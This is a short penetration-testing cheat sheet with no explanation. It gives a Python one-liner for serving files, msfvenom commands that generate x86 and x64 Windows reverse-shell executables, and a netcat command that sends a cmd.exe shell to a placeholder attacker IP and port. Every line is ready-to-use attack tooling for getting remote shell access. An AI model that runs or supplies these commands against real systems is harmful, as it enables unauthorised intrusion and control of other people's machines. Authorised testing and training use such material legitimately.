python3 -m http.server 8080
Stageless Payloads for Windows
x86 | msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe |
x64 | msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe |
c:\temp\nc.exe -e cmd.exe <Attack_IP> <port>